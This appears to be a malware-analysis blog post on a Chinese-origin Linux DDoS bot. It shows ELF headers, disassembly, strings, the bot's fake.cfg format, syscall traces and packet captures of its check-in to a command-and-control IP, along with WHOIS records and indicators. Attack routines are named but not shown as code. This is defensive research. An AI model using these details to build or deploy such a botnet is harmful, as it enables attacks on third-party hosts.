https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/

# =============================
# Binary Analysis
# =============================

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2s complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048120
  Start of program headers:          52 (bytes into file)
  Start of section headers:          1199680 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         5
  Size of section headers:           40 (bytes)
  Number of section headers:         28
  Section header string table index: 25

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  [ 3] .text             PROGBITS        08048120 000120 0e3800 00  AX  0   0 32
  [ 4] __libc_freeres_fn PROGBITS        0812b920 0e3920 000f6e 00  AX  0   0  4
  [ 5] __libc_thread_fre PROGBITS        0812c890 0e4890 0000e2 00  AX  0   0  4
  [ 6] .fini             PROGBITS        0812c974 0e4974 00001a 00  AX  0   0  4
  [ 7] .rodata           PROGBITS        0812c9a0 0e49a0 021eee 00   A  0   0 32
  [ 8] __libc_subfreeres PROGBITS        0814e890 106890 00003c 00   A  0   0  4
  [ 9] __libc_atexit     PROGBITS        0814e8cc 1068cc 000004 00   A  0   0  4
  [10] __libc_thread_sub PROGBITS        0814e8d0 1068d0 000004 00   A  0   0  4
  [11] .eh_frame         PROGBITS        0814e8d4 1068d4 016d08 00   A  0   0  4
  [12] .gcc_except_table PROGBITS        081655dc 11d5dc 005049 00   A  0   0  4
  [13] .tdata            PROGBITS        0816b628 122628 000014 00 WAT  0   0  4
  [14] .tbss             NOBITS          0816b63c 12263c 00001c 00 WAT  0   0  4
  [15] .ctors            PROGBITS        0816b63c 12263c 00002c 00  WA  0   0  4
  [16] .dtors            PROGBITS        0816b668 122668 00000c 00  WA  0   0  4
  [17] .jcr              PROGBITS        0816b674 122674 000004 00  WA  0   0  4
  [18] .data.rel.ro      PROGBITS        0816b680 122680 00063c 00  WA  0   0 32
  [19] .got              PROGBITS        0816bcbc 122cbc 00005c 04  WA  0   0  4
  [20] .got.plt          PROGBITS        0816bd18 122d18 00000c 04  WA  0   0  4
  [21] .data             PROGBITS        0816bd40 122d40 001034 00  WA  0   0 32
  [22] .bss              NOBITS          0816cd80 123d74 0091d8 00  WA  0   0 32
  [23] __libc_freeres_pt NOBITS          08175f58 123d74 000020 00  WA  0   0  4
  [24] .comment          PROGBITS        00000000 123d74 000fa5 00      0   0  1
  [25] .shstrtab         STRTAB          00000000 124d19 000126 00      0   0  1
  [26] .symtab           SYMTAB          00000000 1252a0 018110 10     27 1246  4
  [27] .strtab           STRTAB          00000000 13d3b0 03224e 00      0   0  1

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
  LOAD           0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW  0x1000
  NOTE           0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R   0x4
  TLS            0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 Section to Segment mapping:
  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

Offset 0x000000d4 | len x00000020:
  Owner         Data size       Description
  GNU           0x00000010      NT_VERSION (version)

// Notes:
no dynamic section 
no relocations 
no unwind sections 

# =============================
# Reversing w/debug PoC
# =============================

// first section reversed (for characteristics)
            ;-- section..text:
            0x08048120    31ed         xor ebp, ebp
            0x08048122    5e           pop esi
            0x08048123    89e1         mov ecx, esp
            0x08048125    83e4f0       and esp, 0xfffffff0
            0x08048128    50           push eax
            0x08048129    54           push esp
            0x0804812a    52           push edx
            0x0804812b    68f4c20c08   push sym.__libc_csu_fini ; 0x080cc2f4
            0x08048130    689cc20c08   push sym.__libc_csu_init ; 0x080cc29c
            0x08048135    51           push ecx
            0x08048136    56           push esi
            0x08048137    681ca70408   push sym.main ; 0x0804a71c
            0x0804813c    e8cf390800   call sym.__libc_start_main
               0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
            0x08048141    f4           hlt
            0x08048142    90           nop
            0x08048143    90           nop

// Chinese does appear quite often through the binary, this ties in with the chinese source that these were obtained from.
// Not sure where this katakana on the first line came from though... - Yinette

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG 
0x0075693  B4CUNG
0x0102520  i18n:1999
  :

// config:
0x00E5C22  fake.cfg
// template:
%d
%d.%d.%d.%d:%d.%d.%d.%d
%d:%d

// poc:
# cat fake.cfg
0
YOUR-IP-HERE:AND-HERE
10000:60000

// Obtain IP of interface with the default route and write it to fake.cfg:

getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0


//Does a DNS Query for www.baidu.com against google's open resolvers at 8.8.8.8 (To test for internet reachability)

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74

// compile/compat traces:

0x0124CC0  GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
0x0124CED  GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)

// Sources:

 'crtstuff.c'
 'Fake.cpp'
 'Global.cpp'
 'main.cpp'
 'Manager.cpp'
 'ProtocolUtil.cpp'
 'ServerIP.cpp'
 'StatBase.cpp'
 'ThreadAttack.cpp'
 'ThreadAttackKernal.cpp'
 'ThreadHostStatus.cpp'
 'ThreadTaskManager.cpp'
 'ThreadTimer.cpp'
 'AutoLock.cpp'
 'FileOp.cpp'
 'Log.cpp'
 'Md5.cpp'
 'Media.cpp'
 'NetBase.cpp'
 'ThreadCondition.cpp'
 'Thread.cpp'
 'ThreadMutex.cpp'
 'Utility.cpp'

// The ThreadAttack.cpp file in particular provides key functions for some
// nasty looking attacks:

CThreadAttack::ProcessMain(void)
CThreadAttack::EmptyConnectionAtk(CSubTask &)
CThreadAttack::HttpAtk(CSubTask &) 
CThreadAttack::FakeUserAtk(CSubTask &)
CThreadAttack::Stop(void)  
CThreadAttack::DomainInitEx(CRandArray &,char  const*)  
CThreadAttack::DomainRandEx(CRandArray &,int &) 
CThreadAttack::CrossPkt(int) 
CThreadAttack::~CThreadAttack() 
CThreadAttack::CThreadAttack(CManager *)
CThreadAttack::Start(CCmdMessage *)
CThreadAttack::InitCrossPkts(std::vector..
CThreadAttack::PktAtk(CSubTask &,std::vector http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
180.76.3.151    x.x.x.x TCP 74  http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
x.x.x.x 180.76.3.151    TCP 54  48417 > http [RST] Seq=1 Win=0 Len=0

// 2. Send data back to CnC:

x.x.x.x 61.147.103.21   TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401

00000000  b8 0b 00 00 00 4e 2e 25  45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
00000010  ea 4c 69 6e 75 78 20 33  2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
00000020  6d 64 36 34 00 00 00 00  00 00 00 00 00 00 00 00 md64.... ........
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000190  00                                               .

----
#MalwareMustDie!
/* This analysis post is dedicated to all UNIX sysadmins */

Full copy here: http://pastebin.com/949Y8a3g

Domain and IP analysis

Interestingly (or not), the attack in this instance came from the same IP that we saw hosting the files and the same IP that is the CNC. The system itself appears to be a machine hosted out of Jiangsu Provence, China.

Here’s what we could see on the web-based file explorer:

(photo supplied by MalwareMustDie)

After I had retrieved MOST of the files, it appears they noticed and then deleted everything (hey guys! lol)

There is a domain pointing to our CNC,Hosting,Attack IP (as evident in our massive shell script) pingyan-china.com

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name:pingyan-china.com
Registry Domain ID:
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:http://www.xinnet.com
Updated Date:2013-09-30 00:38:42
Creation Date:2013-09-30 00:33:31
Registrar Registration Expiration Date:2014-09-30 00:33:31
Registrar:XINNET TECHNOLOGY CORPORATION
Registrar IANA ID:120
Registrar Abuse Contact Email:supervision@xinnet.com
Registrar Abuse Contact Phone:+86.1087128064
Domain Status:ok
Registry Registrant ID:
Registrant Name:Wang ShanShi
Registrant Organization:fdgf fggh
Registrant Street:gghjkj  ddfgh dddf
Registrant City:chengdu
Registrant State/Province:Sichuan
Registrant Postal Code:310400
Registrant Country:China
Registrant Phone:+86.028 89908908
Registrant Phone Ext:
Registrant Fax:+86.028 78789090
Registrant Fax Ext:
Registrant Email:280954460@qq.com
Registry Admin ID:
Admin Name:fdgf fggh
Admin Organization:fdgf fggh
Admin Street:gghjkj  ddfgh dddf
Admin City:chengdu
Admin State/Province:Sichuan
Admin PostalCode:310400
Admin Country:China
Admin Phone:+86.028 89908908
Admin Phone Ext:
Admin Fax:+86.028 78789090
Admin Fax Ext:
Admin Email:280954460@qq.com
Registry Tech ID:
Tech Name:fdgf fggh
Tech Organization:fdgf fggh
Tech Street:gghjkj  ddfgh dddf
Tech City:chengdu
Tech State/Province:Sichuan
Tech PostalCode:310400
Tech Country:China
Tech Phone:+86.028 89908908
Tech Phone Ext:
Tech Fax:+86.028 78789090
Tech Fax Ext:
Tech Email:280954460@qq.com
Name Server:dxdns.ybnic.com
Name Server:dxdns2.ybnic.com
Name Server:ltdns.ybnic.com
Name Server:gwdns.ybnic.com
DNSSEC:unsigned

As you can see in the whois, this is likely to not be a legitimate registration, unless Wang Shanshi works at a company called ‘fdgf fggh’ at the address of ‘gghjkj ddfgh dddf, Sichuan, CN.’

(Or Mr Shanshi is a lazy bastard at typing.)

Google couldn’t help me with that one…

The IP 61.147.103.21 itself is familiar to me:

inetnum:        61.147.0.0 - 61.147.255.255
netname:        CHINANET-JS
descr:          CHINANET jiangsu province network
descr:          China Telecom
descr:          A12,Xin-Jie-Kou-Wai Street
descr:          Beijing 100088
country:        CN
admin-c:        CH93-AP
tech-c:         CJ186-AP
mnt-by:         MAINT-CHINANET
mnt-lower:      MAINT-CHINANET-JS
mnt-routes:     maint-chinanet-js
changed:        hostmaster@ns.chinanet.cn.net 20020209
changed:        hostmaster@ns.chinanet.cn.net 20030306
status:         ALLOCATED non-PORTABLE
source:         APNIC

role:           CHINANET JIANGSU
address:        260 Zhongyang Road,Nanjing 210037
country:        CN
phone:          +86-25-86588231
phone:          +86-25-86588745
fax-no:         +86-25-86588104
e-mail:         ip@jsinfo.net
remarks:        send anti-spam reports to spam@jsinfo.net
remarks:        send abuse reports to abuse@jsinfo.net
remarks:        times in GMT+8
admin-c:        CH360-AP
tech-c:         CS306-AP
tech-c:         CN142-AP
nic-hdl:        CJ186-AP
remarks:        www.jsinfo.net
notify:         ip@jsinfo.net
mnt-by:         MAINT-CHINANET-JS
changed:        dns@jsinfo.net 20090831
changed:        ip@jsinfo.net 20090831
changed:        hm-changed@apnic.net 20090901
source:         APNIC
changed:        hm-changed@apnic.net 20111114

person:         Chinanet Hostmaster
nic-hdl:        CH93-AP
e-mail:         anti-spam@ns.chinanet.cn.net
address:        No.31 ,jingrong street,beijing
address:        100032
phone:          +86-10-58501724
fax-no:         +86-10-58501724
country:        CN
changed:        dingsy@cndata.com 20070416
changed:        zhengzm@gsta.com 20140227
mnt-by:         MAINT-CHINANET
source:         APNIC

This doesn’t surprise me, ranges in the 61.147.0.0/16 are known for malicious traffic. In particular I’ve spotted the entire 61.147.51.0/24 range SSH Brute-Forcing a lot of IPs at once. Someone has some serious resources going into this shit.

Quick Update!

Seems after deleting everything off their webserver, they decided to upload something new.

Check out the following VirusTotal Result and MMD’s comments with some quick RE notes :)

https://www.virustotal.com/en/file/6dd946e821df59705dcfeb79fab810336d0ee497fd715fb5b6711e05c0428f4d/analysis/

It seems for this DDoS binary to run properly, it needs root access on the host system. This is why it is trying to root the system it has targeted.

More to come!

Thanks to:

MalwareMustDie for ELF Analysis and Research.

These random chinese guys for leaving their toys for me to find :)

My work for allowing me to do cool shit like this for a hobby.